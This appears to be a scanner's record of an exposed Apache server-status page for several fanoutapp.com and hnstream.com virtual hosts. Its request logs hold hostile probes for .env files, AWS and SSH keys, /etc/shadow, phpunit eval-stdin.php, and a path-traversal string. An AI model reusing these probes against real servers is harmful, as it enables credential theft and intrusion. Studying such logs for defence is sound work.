157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00312088077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00312088476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00312088667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.003120881259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00312088668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00312088474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00312088363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00312088465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00312088380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00312088569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00312088464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00312088061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00312088368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00312088173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00312088364570.00.001.89 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf029a78bb
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Saturday, 22-Feb-2025 09:24:23 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 44 Parent Server MPM Generation: 43 Server uptime: 42 days 10 hours 45 minutes 26 seconds Server load: 0.29 0.16 0.11 Total accesses: 44644 - Total Traffic: 129.6 MB - Total Duration: 608168 CPU Usage: u61.44 s102.26 cu869.27 cs316.49 - .0368% CPU load .0122 requests/sec - 37 B/second - 3044 B/request - 13.6226 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03788778no0yes124000 23788779no0yes025000 Sum200 149000 ______________________W__.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4337887780/20/747_ 0.4438154126010.00.121.99 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /backend/.env HTTP/1.1 0-4337887780/19/733_ 0.4438163124880.00.042.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /config/.env HTTP/1.1 0-4337887780/11/718_ 0.453633990990.00.032.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-4337887780/18/753_ 0.4438153116280.00.042.09 127.0.0.1http/1.1chat.fanoutapp.com:8000POST / HTTP/1.1 0-4337887780/12/689_ 0.383810399440.00.101.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4337887780/12/724_ 0.35362810111950.00.022.15 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4337887780/11/732_ 0.4233731103860.00.032.03 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4337887780/18/733_ 0.4533781596350.00.192.01 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4337887780/15/718_ 0.4524611093320.00.032.33 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4337887780/19/756_ 0.457441111550.00.052.29 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4337887780/19/714_ 0.4224568103740.00.192.15 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4337887780/18/731_ 0.4273938106200.00.042.24 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-4337887780/10/707_ 0.45238100670.00.031.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-4337887780/16/742_ 0.4565413105920.00.041.93 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4337887780/18/720_ 0.436493105050.00.041.88 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /phpinfo.php HTTP/1.1 0-4337887780/15/736_ 0.4613128270.00.032.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-4337887780/20/719_ 0.4613121710.00.071.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-4337887780/19/732_ 0.451484950.00.052.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4337887780/19/737_ 0.460389600.00.052.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4337887780/19/727_ 0.461387680.00.061.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4337887780/16/705_ 0.460396390.00.041.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4337887780/15/741_ 0.460389600.00.041.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-43378877810/15/717W 0.440097000.00.041.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4337887780/16/736_ 0.460381220.00.122.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4337887780/18/724_ 0.443815399300.00.042.28 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /docker/.env HTTP/1.1 1-41-0/0/572. 0.00120235192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00120235492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.001202352671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.001202351174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00120235388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00120235070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00120235369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00120235563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00120235670490.00.001.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00120235077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00120235476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00120235667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.001202351259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00120235668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00120235474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00120235363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00120235465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00120235380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00120235569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00120235464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00120235061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00120235368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00120235173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00120235364570.00.001.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/581. 0.001202352156490.00.001.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf2b74d648
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 20-Feb-2025 10:43:09 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 40 days 12 hours 4 minutes 11 seconds Server load: 0.04 0.08 0.08 Total accesses: 40918 - Total Traffic: 117.8 MB - Total Duration: 583983 CPU Usage: u58.44 s97.34 cu820.86 cs300.19 - .0365% CPU load .0117 requests/sec - 35 B/second - 3017 B/request - 14.272 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03619702no0yes025000 13619703no0yes124000 Sum200 149000 _______________________________________W__________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4136197020/11/690_ 0.292294123140.00.031.53 127.0.0.1http/1.1api.hnstream.com:8000GET /cOcH HTTP/1.1 0-4136197020/10/678_ 0.3016070116230.00.022.14 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4136197020/8/674_ 0.301656084340.00.092.02 127.0.0.1http/1.1hnstream.com:8000GET /backup.tar.gz HTTP/1.1 0-4136197020/11/702_ 0.30156111114020.00.021.96 127.0.0.1http/1.1api.hnstream.com:8000GET /actuator/gateway/routes HTTP/1.1 0-4136197020/8/644_ 0.281556397710.00.021.47 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-4136197020/10/679_ 0.3020323108690.00.021.87 127.0.0.1http/1.1api.hnstream.com:8000GET /jquery-3.3.1.slim.min.js HTTP/1.1 0-4136197020/9/689_ 0.2920263102000.00.021.92 127.0.0.1http/1.1api.hnstream.com:8000GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 0-4136197020/12/682_ 0.31234194040.00.031.72 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4136197020/10/672_ 0.302032491390.00.032.23 127.0.0.1http/1.1api.hnstream.com:8000GET /aab9 HTTP/1.1 0-4136197020/9/704_ 0.2920325108450.00.021.98 127.0.0.1http/1.1api.hnstream.com:8000GET /aab8 HTTP/1.1 0-4136197020/11/662_ 0.301656097110.00.061.79 127.0.0.1http/1.1hnstream.com:8000GET /etc/ssl/private/server.key HTTP/1.1 0-4136197020/10/678_ 0.3016560102990.00.052.09 127.0.0.1http/1.1hnstream.com:8000GET /api/.env HTTP/1.1 0-4136197020/13/663_ 0.301656098250.00.031.69 127.0.0.1http/1.1hnstream.com:8000GET /config.json HTTP/1.1 0-4136197020/9/694_ 0.3016560103160.00.031.82 127.0.0.1http/1.1hnstream.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4136197020/10/672_ 0.3016560103410.00.021.78 127.0.0.1http/1.1hnstream.com:8000GET /config/database.php HTTP/1.1 0-4136197020/10/687_ 0.3016560125770.00.021.95 127.0.0.1http/1.1hnstream.com:8000GET /_vti_pvt/authors.pwd HTTP/1.1 0-4136197020/11/665_ 0.3016560119220.00.031.67 127.0.0.1http/1.1hnstream.com:8000GET /_vti_pvt/administrators.pwd HTTP/1.1 0-4136197020/11/680_ 0.301656082920.00.032.27 127.0.0.1http/1.1hnstream.com:8000GET /etc/shadow HTTP/1.1 0-4136197020/10/681_ 0.291651385830.00.062.06 127.0.0.1http/1.1api.hnstream.com:8000GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-4136197020/9/678_ 0.291620385440.00.021.70 127.0.0.1http/1.1api.hnstream.com:8000GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-4136197020/8/654_ 0.291602392970.00.021.68 127.0.0.1http/1.1api.hnstream.com:8000GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1 0-4136197020/11/695_ 0.301625887840.00.041.83 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4136197020/9/666_ 0.302031388890.00.031.82 127.0.0.1http/1.1api.hnstream.com:8000GET /jquery-3.3.2.slim.min.js HTTP/1.1 0-4136197020/9/689_ 0.301656079070.00.021.81 127.0.0.1http/1.1hnstream.com:8000GET /.kube/config HTTP/1.1 0-4136197020/11/674_ 0.301656096290.00.032.01 127.0.0.1http/1.1hnstream.com:8000GET /wp-config.php HTTP/1.1 1-4136197030/7/518_ 0.31733090480.00.081.82 127.0.0.1http/1.1hnstream.com:8000GET /config/production.json HTTP/1.1 1-4136197030/11/514_ 0.324462590670.00.011.42 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sitemap.xml.gz HTTP/1.1 1-4136197030/13/498_ 0.33419668980.00.021.67 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-4136197030/7/519_ 0.31441072280.00.101.79 127.0.0.1http/1.1hnstream.com:8000GET /config.yaml HTTP/1.1 1-4136197030/6/525_ 0.31414086760.00.011.59 127.0.0.1http/1.1hnstream.com:8000GET /.well-known/security.txt HTTP/1.1 1-4136197030/11/513_ 0.3302368810.00.021.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-4136197030/8/532_ 0.330466720.00.011.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4136197030/8/518_ 0.330361030.00.011.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4136197030/10/526_ 0.330368450.00.021.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4136197030/10/510_ 0.330375350.00.021.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4136197030/8/520_ 0.330374570.00.011.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4136197030/10/523_ 0.330365260.00.021.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4136197030/9/517_ 0.330357670.00.091.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4136197030/9/508_ 0.330365390.00.011.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-41361970310/11/533W 0.310071260.00.021.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-4136197030/6/506_ 0.301389061290.00.021.34 127.0.0.1http/1.1hnstream.com:8000GET /config.php HTTP/1.1 1-4136197030/9/526_ 0.321241263140.00.011.61 104.156.83.21http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-4136197030/9/528_ 0.321240678200.00.031.76 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-4136197030/8/513_ 0.301236066580.00.101.54 127.0.0.1http/1.1hnstream.com:8000GET /server.key HTTP/1.1 1-4136197030/8/494_ 0.301235062660.00.041.35 127.0.0.1http/1.1hnstream.com:8000GET /.ssh/id_rsa HTTP/1.1 1-4136197030/9/518_ 0.301120059920.00.011.79 127.0.0.1http/1.1hnstream.com:8000GET /.svn/wc.db HTTP/1.1 1-4136197030/5/509_ 0.321125165980.00.011.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-4136197030/7/504_ 0.321022671550.00.011.84 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-4136197030/9/506_ 0.327381562200.00.161.74 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfed51c06d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 18-Feb-2025 15:31:25 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 38 days 16 hours 52 minutes 27 seconds Server load: 0.16 0.20 0.18 Total accesses: 37585 - Total Traffic: 104.2 MB - Total Duration: 512710 CPU Usage: u56.1 s93.22 cu775.76 cs286.87 - .0362% CPU load .0112 requests/sec - 32 B/second - 2908 B/request - 13.6413 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03447519no0yes025000 13447520no0yes124000 Sum200 149000 ___________________________W______________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3934475190/6/631_ 0.254666111680.00.011.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-3934475190/9/618_ 0.264710104920.00.022.04 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/themes/photocrati-theme-v4.07/admin/scripts/scr 0-3934475190/7/622_ 0.251335479050.00.011.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3934475190/8/650_ 0.261335398880.00.021.79 45.207.221.152http/1.1api.hnstream.com:8000GET /device.rsp?opt=user&cmd=list HTTP/1.1 0-3934475190/9/594_ 0.241338683770.00.091.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3934475190/10/627_ 0.261338493900.00.021.71 45.207.221.152http/1.1api.hnstream.com:8000GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir 0-3934475190/10/632_ 0.231338687450.00.021.80 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3934475190/10/625_ 0.26193179040.00.011.57 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3934475190/7/616_ 0.25188680390.00.012.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-3934475190/8/643_ 0.254265688740.00.091.78 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3934475190/7/600_ 0.2142601291170.00.011.57 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3934475190/8/628_ 0.254021088410.00.011.89 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3934475190/8/607_ 0.234016082350.00.021.41 206.168.34.212http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3934475190/7/635_ 0.253822588190.00.021.61 167.82.173.41http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-3934475190/9/615_ 0.233817395290.00.021.60 206.168.34.212http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-3934475190/10/633_ 0.2313494111650.00.021.68 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3934475190/10/611_ 0.261349199600.00.011.41 45.207.221.152http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3934475190/9/624_ 0.231353877340.00.022.06 45.207.221.152http/1.1 0-3934475190/6/624_ 0.2325123971630.00.011.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-3934475190/10/626_ 0.252517580010.00.021.50 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3934475190/10/610_ 0.261347180750.00.021.52 45.207.221.152http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3934475190/9/637_ 0.231347473710.00.021.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3934475190/11/604_ 0.261341373790.00.021.59 45.207.221.152http/1.1api.hnstream.com:8000GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir 0-3934475190/9/638_ 0.231340368400.00.021.63 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3934475190/9/623_ 0.261338381990.00.021.90 45.207.221.152http/1.1api.hnstream.com:8000GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir 1-3934475200/14/451_ 0.350371400.00.031.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3934475200/13/443_ 0.341340374300.00.031.19 45.207.221.152http/1.1api.hnstream.com:8000GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir 1-39344752010/9/435W 0.320053480.00.021.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3934475200/10/447_ 0.350351530.00.021.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3934475200/14/462_ 0.350370480.00.021.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3934475200/10/449_ 0.350353700.00.021.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3934475200/11/460_ 0.350355670.00.021.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3934475200/11/451_ 0.32586345900.00.101.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3934475200/13/454_ 0.331341453410.00.031.10 45.207.221.152http/1.1api.hnstream.com:8000GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir 1-3934475200/12/441_ 0.321341563580.00.031.39 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/13/451_ 0.321340658780.00.031.34 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/13/452_ 0.3413113250900.00.031.24 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/11/452_ 0.331306143520.00.031.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3934475200/12/442_ 0.34708949880.00.091.49 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/14/460_ 0.33703554980.00.121.45 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/12/442_ 0.34592951570.00.021.17 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-3934475200/14/461_ 0.34591147950.00.101.38 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 1-3934475200/15/461_ 0.32100363640.00.101.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3934475200/11/447_ 0.34105651230.00.021.26 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3934475200/11/429_ 0.3562152190.00.091.17 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3934475200/15/455_ 0.3257349070.00.111.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-3934475200/12/448_ 0.350356220.00.031.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3934475200/13/434_ 0.3502455640.00.171.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3934475200/14/442_ 0.350342910.00.051.12 127.0.0.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf1a1632a7
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 16-Feb-2025 15:22:30 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 38 Parent Server MPM Generation: 37 Server uptime: 36 days 16 hours 43 minutes 33 seconds Server load: 0.53 0.38 0.25 Total accesses: 35771 - Total Traffic: 98.6 MB - Total Duration: 496310 CPU Usage: u53.66 s88.82 cu736.54 cs273.33 - .0363% CPU load .0113 requests/sec - 32 B/second - 2890 B/request - 13.8746 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03273670no0yes124000 13273671no0yes025000 Sum200 149000 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3732736700/18/601_ 0.4804104340.00.061.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3732736700/21/589_ 0.48031103300.00.061.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3732736700/16/590_ 0.47298176540.00.051.74 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 0-3732736700/19/623_ 0.480392970.00.061.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3732736700/19/560_ 0.480381320.00.061.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-3732736700/17/598_ 0.480387840.00.131.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3732736700/21/599_ 0.480383130.00.061.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3732736700/24/596_ 0.480377880.00.151.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3732736700/18/585_ 0.480378730.00.062.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3732736700/19/612_ 0.47681186550.00.071.62 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 0-3732736700/18/572_ 0.483032885080.00.051.43 157.52.72.70http/1.1api.livecounter.org:8000POST /wp-content/plugins/wp-ver.php HTTP/1.1 0-3732736700/18/601_ 0.44481186590.00.121.83 206.168.34.193http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3732736700/18/571_ 0.48486080380.00.061.31 127.0.0.1http/1.1hnstream.com:8000GET /llms.txt HTTP/1.1 0-3732736700/19/605_ 0.47488086440.00.061.52 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3732736700/24/584_ 0.46678192780.00.071.51 127.0.0.1http/1.1hnstream.com:8000GET /static/json2.js HTTP/1.1 0-3732736700/23/599_ 0.4903110140.00.071.58 